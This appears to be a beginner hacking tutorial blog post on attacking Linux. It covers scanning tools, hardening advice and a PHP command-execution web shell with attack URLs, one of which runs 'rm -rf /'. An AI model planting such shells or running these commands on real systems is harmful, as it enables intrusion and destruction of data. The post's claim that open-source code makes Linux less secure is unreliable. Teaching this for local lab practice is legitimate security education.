Skip to main content

Hacking Linux Systems

Linux is the most widely used server operating system, especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.
In this article, we will introduce you to what Linux is, its security vulnerabilities and the counter measures you can put in place.

Quick Note on Linux

Linux is an open source operating system. There are many distributions of Linux-based operating systems such as Redhat, Fedora, and Ubuntu, etc. Unlike other operating system, Linux is less secure when it comes to security. This is because the source code is available freely, so it is easy to study it for vulnerabilities and exploit them compared to other operating systems that are not open source. Linux can be used as a server, desktop, tablet, or mobile device operating system.
Linux programs can be operated using either GUI or commands. The commands are more effective and efficient compared to using the GUI. For this reason, it helps to know Linux basic commands.
Refer to these tutorials https://www.guru99.com/unix-linux-tutorial.html on how to get started with Linux.

Linux Hacking Tools

  • Nessus– this tool can be used to scan configuration settings, patches, and networks etc. it can be found at http://www.tenable.com/products/nessus
  • NMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at http://nmap.org/
  • SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at http://www-arc.com/sara/sara.html
The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.

How to prevent Linux hacks

Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.
  • Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
  • Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
  • Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.

Hacking Activity: Hack a Ubuntu Linux System using PHP

In this practical scenario, we will provide you with basic information on how you can use PHP to compromise a Linux. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.
PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as a string.
<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HERE,
The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.
The above code can be exploited using the following URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HERE,
  • “…konsole.php?cmd=ls%20-l”assigns the value ls –l to the variable cmd.
The command executed against the server will be
shell_exec('ls -l') ;
Executing the above code on a web server gives results similar to the following.
The above command simply displays the files in the current directory and the permissions
Let’s suppose the attacker passes the following command
rm -rf /
HERE,
  • “rm” removes the files
  • “rf” makes the rm command run in a recursive mode. Deleting all the folders and files
  • “/” instructs the command to start deleting files from the root directory
The attack URL would look something like this
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Summary

  • Linux is a popular operating system for servers, desktops, tablets and mobile devices.
  • Linux is open source, and the source code can be obtained by anyone. This makes it easy to spot the vulnerabilities.
  • Basic and networking commands are valuable to Linux hackers.
  • Vulnerabilities are a weakness that can be exploited to compromise a system.
  • A good security can help to protect a system from been compromised by an attacker.

Comments

Popular posts from this blog

Top 20 Tools for Ethical hacking in 2020

What are Hacking Tools? Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers and networks. There is a variety of such tools available on the market. Some of them are open source while others are commercial solution. In this list we highlight the top 20 tools for Ethical Hacking of web applications, servers and networks 1)  Netsparker Netsparker  is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution. Features Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology. Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages. REST API for seamless integration with the SDLC, bug tracking systems etc. Fully scalable solution. Scan 1,000 web application...

CompTIA Certification Guide: Career Paths & Study Material

CompTIA Certification Guide: Career Paths & Study Material What is CompTIA Certification? CompTIA certifications  course are considered one of the most trusted credentials in the IT industry as it accurately reflects employee success. CompTIA engages international focus groups and IT leaders from around the world that define various certification programs and helps you to create CompTIA certification exams. How to start a career with CompTIA certifications? If you are looking to start an IT career with a renowned certification, which has global recognition and ready-for acceptance by the employers, then CompTIA certification is the best way to start. This certification helps you to build critical thinking and problem-solving abilities, which is imperative in the modern enterprise network. The certification programs come in easy-to-learn ways to suit your time and convenience. You could take up a self-study or instruction-based learning. It is also meant for stu...

Kali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap

Kali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap What is Kali Linux? Kali Linux is a Security Distribution of Linux specifically designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack. BackTrack was their previous information security Operating System. The first iteration of Kali Linux was Kali 1.0.0 was introduced in March 2013. Offensive Security currently funds and supports Kalin Linux. If you were to visit Kali's website today ( www.kali.org ), you would see a large banner stating, "Our Most Advanced Penetration Testing Distribution, Ever." A very bold statement that ironically has yet to be disproven. Kali Linux has over 600 preinstalled penetration-testing applications to discover. Each program with its unique flexibility and use case. Kali Linux does excellent job separating these useful utilities into the following categories: In...